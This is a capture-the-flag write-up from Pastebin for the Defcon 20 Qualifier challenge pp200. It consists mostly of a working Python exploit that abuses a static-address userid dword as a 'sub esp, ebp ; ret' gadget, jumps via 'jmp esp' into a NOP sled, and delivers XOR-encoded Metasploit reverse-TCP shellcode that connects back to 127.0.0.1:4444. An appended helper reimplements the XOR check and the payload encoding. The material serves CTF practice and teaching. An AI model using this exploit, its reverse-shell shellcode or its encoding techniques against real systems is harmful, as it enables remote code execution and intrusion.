Defcon 20 CTF Quals - PP200 Write up - Pastebin.com
a guest
Jun 4th, 2012
#!/usr/bin/env python3
# exploit by @jgrusko
# You can find a detailed analysis here:
# https://blog.oxff.net/posts/DefCon%2020%20CTF%20Qualifications%3A%20pp200-jmjgjxh7rng7hgjyd7hq.html
# I'll just focus my explanation on the way used to avoid relying on a stack address, which
# is not always reliable (the stack can shift between runs).
# As said in the blog post, verify_userid() takes a dword as parameter and stores it at the
# static address 0x0804C58C.
# Then the four bytes of the dword are XORed together and the result is compared to 0xa6, as in
# the following pseudo code:
#     int verify_userid(unsigned int userid)
#     {
#         unsigned char *dword = (unsigned char *)&userid;
#         return ((dword[0] ^ dword[1] ^ dword[2] ^ dword[3]) == 0xa6);
#     }
# This means that we can choose 3 ARBITRARY bytes and use the last one to make the result 0xa6
# (XOR is commutative, so the fourth byte is simply b0 ^ b1 ^ b2 ^ 0xa6).
# Since this dword is located at a static address, we can use it as our return address.
# By supplying the dword 0x29ecc3a0, verify_userid() will succeed. When exploiting the
# stack overflow and returning to 0x0804C58C, the following 2 instructions get executed:
# ==============
# sub esp, ebp ; 0x29 0xec
# ret          ; 0xc3
# ==============
# Since the saved frame pointer (sfp) has also been overwritten, ebp now contains an arbitrary
# value, which in our case is 0x214. After 0x214 is subtracted from ESP, it points at the
# beginning of our payload. The first dword there is the address of a "jmp esp" instruction,
# so the ret lands on it and jumps directly into the NOP sled and shellcode.
# Even though we supply a whole dword, the shellcode is only XORed with the MSB of this
# dword (0x29), so that is the key we encode the payload with.
# Here's the exploit code:
import socket
import struct

# metasploit bsd/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444
# If you are trying this on your system, remember the program
# performs a chroot() call, thus, if /bin/sh is not present
# inside pp200's home directory you won't get a shell ;)
shellcode = (
    b"\x68\x7f\x00\x00\x01\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0"
    b"\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50"
    b"\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8"
    b"\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    b"\x50\x54\x53\x50\xb0\x3b\xcd\x80"
)

jmpESP = struct.pack("<I", 0x0804b56b)   # address of a "jmp esp" in the binary
retAddr = struct.pack("<I", 0x0804c58c)  # static address where the userid dword is stored


# XOR-encode the payload with the MSB of the userid dword (0x29)
def xor_payload(payload):
    return bytes(b ^ 0x29 for b in payload)


def exploit():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("localhost", 8912))

    # Send password
    s.send(b"b74b9d86e6cd3480\n")
    print(s.recv(1024))

    # Send userid: the dword whose bytes XOR to 0xa6 and decode to "sub esp, ebp ; ret"
    s.send(b"a0c3ec29\n")
    print(s.recv(1024))

    # 0x200-byte buffer: "jmp esp" address, NOP sled, shellcode; then the byte that
    # follows the buffer, the saved ebp (0x214) and the return address (0x0804c58c)
    payload = jmpESP + b"\x90" * (0x200 - 4 - len(shellcode)) + shellcode
    payload += b"\x0b" + struct.pack("<I", 0x214) + retAddr + b"\n"
    s.send(xor_payload(payload) + b"\n")
    print(s.recv(1024))
    s.close()


if __name__ == "__main__":
    exploit()
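The write-up's trick rests on two observations: the userid check only XORs the four bytes together, so three bytes can be chosen freely and the fourth computed; and the payload is XOR-encoded with a single key byte, which is its own inverse. The snippet below is an added example, not part of the original paste or @jgrusko's exploit: it reimplements the check as described, derives the fourth byte for the gadget bytes 29 ec c3 given above, shows that the check passes regardless of byte order (only the in-memory order matters for what executes at 0x0804C58C), and adds a bad-byte scan that assumes, hypothetically, that the service reads its input line by line and would stop at a newline.

```python
#!/usr/bin/env python3
# Added example, not from the original write-up. The constants TARGET and GADGET
# are taken from the write-up; the line-oriented input assumption in bad_offsets()
# is a hypothetical added here.
import struct
from itertools import permutations

TARGET = 0xA6             # XOR of the four userid bytes must equal this (from the write-up)
GADGET = b"\x29\xec\xc3"  # sub esp, ebp ; ret  (instruction bytes given in the write-up)


def verify_userid(userid: int) -> bool:
    """The check from the write-up's pseudocode, applied to the
    little-endian bytes of the 32-bit value."""
    b = struct.pack("<I", userid & 0xFFFFFFFF)
    return (b[0] ^ b[1] ^ b[2] ^ b[3]) == TARGET


def complete_userid(three: bytes, target: int = TARGET) -> bytes:
    """Pick the fourth byte so the XOR of all four equals `target`.

    XOR is associative and commutative, so for any b0, b1, b2 the byte
    b0 ^ b1 ^ b2 ^ target makes the whole thing XOR to target.
    """
    if len(three) != 3:
        raise ValueError("need exactly three bytes")
    fourth = three[0] ^ three[1] ^ three[2] ^ target
    return three + bytes([fourth])


def check_is_order_independent(four: bytes) -> bool:
    """Every permutation of the four bytes gives the same verdict, because the
    check never looks at positions. The order only matters once the CPU
    decodes those bytes as instructions at the static address."""
    verdicts = {verify_userid(struct.unpack("<I", bytes(p))[0])
                for p in permutations(four)}
    return len(verdicts) == 1


def encode_payload(payload: bytes, key: int) -> bytes:
    """Single-byte XOR with the key the target derives from the userid dword.
    Applying it twice returns the original bytes."""
    return bytes(b ^ (key & 0xFF) for b in payload)


def bad_offsets(encoded: bytes, bad: bytes = b"\n") -> list:
    """Offsets where the encoded stream contains a byte the input path would
    stop at. Assumption for this example: the service reads one line, so a
    plaintext byte equal to key ^ 0x0a would truncate the payload."""
    return [i for i, b in enumerate(encoded) if b in bad]


if __name__ == "__main__":
    userid = complete_userid(GADGET)          # 29 ec c3 a0
    key = 0x29                                # MSB of the dword per the write-up
    print("userid bytes:", userid.hex())
    print("order independent:", check_is_order_independent(userid))
    sample = b"\x90" * 4 + b"\x23" + b"\xcc"  # constructed sample, 0x23 ^ 0x29 == 0x0a
    enc = encode_payload(sample, key)
    print("encoded:", enc.hex(), "bad offsets:", bad_offsets(enc))
```

Running it prints the four userid bytes 29ecc3a0 and flags offset 4 of the constructed sample, where a plaintext 0x23 becomes a newline after encoding; the write-up's real payload contains no such byte, which is why its single trailing newline is the only one the service sees.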